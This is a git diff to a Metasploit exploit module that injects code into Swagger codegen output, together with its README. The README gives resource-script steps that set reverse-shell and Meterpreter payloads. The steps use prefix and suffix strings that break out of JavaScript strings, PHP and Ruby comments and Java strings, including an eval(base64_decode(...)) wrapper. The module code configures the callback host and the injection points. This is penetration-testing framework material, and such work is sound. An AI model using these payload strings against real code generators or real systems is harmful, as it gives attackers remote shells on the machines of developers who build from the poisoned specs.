diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md old mode 100644 new mode 100755 index da9947f840..280d7bdf75 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md +++ b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md @@ -21,7 +21,7 @@ set LPORT 4444 run ``` -3. Pick a target +3. Pick a target ## Targets @@ -32,70 +32,18 @@ This attack looks to inject a payload into javascript by terminating a URL path [nodejs-codegen](nodejs-codegen.rc) ``` -set PAYLOAD nodejs/shell_reverse_tcp +set PAYLOAD nodejs/shell_reverse_tcp use exploit/multi/fileformat/swagger_param_inject set INFO_VERSION "1.0.0" set PAYLOAD_LOC "PATH" set PAYLOAD_PREFIX "/a');};};return exports;}));" set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('" - +set SWAGGER_HOST "localhost" run ``` -**PHP** - -This attack takes advantage of injection of variables into multiline comment area. - -[php-codegen](php-codegen.rc) - -``` -set PAYLOAD php/meterpreter/reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('" -set PAYLOAD_SUFFIX "')); /*" - -run -``` - - -**Ruby** - -This attack takes advantage of injection of variables into multiline comment area. - -[ruby-codegen](ruby-codegen.rc) - -``` -set PAYLOAD ruby/shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_LOC "INFO_TITLE" -set PAYLOAD_PREFIX "=end " -set INFO_DESCRIPTION "=begin " - -run -``` - -**Java** - -This attack looks to inject a payload into javascript by terminating a URL path string, and placing code inline without causing runtime errors. - -[java-codegen](java-codegen.rc) - -``` -set PAYLOAD java/jsp_shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_LOC "PATH" -set PAYLOAD_PREFIX "a\\\"; " - -run -``` ## Quick Test diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb old mode 100644 new mode 100755 index abfe975cd8..f8bdc91882 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -50,15 +50,14 @@ class MetasploitModule < Msf::Exploit::Remote [ OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']), OptPort.new('LPORT', [true, 'Server port.']), - OptString.new('PAYLOAD', [false, 'Payload Injection']), OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']), OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']), - OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point','INFO_DESCRIPTION']), + OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]), OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']), OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']), OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']), OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]), - OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4', 'X.Y.Z.xyz']), + OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']), OptString.new('BASE_PATH', [true, 'The root path of API on host.', '/']), OptString.new('PATH', [true, 'Path of request/response on root path.', '/a']), OptString.new('PATH_DESCRIPTION', [true, 'Description of a path request object', 'D']),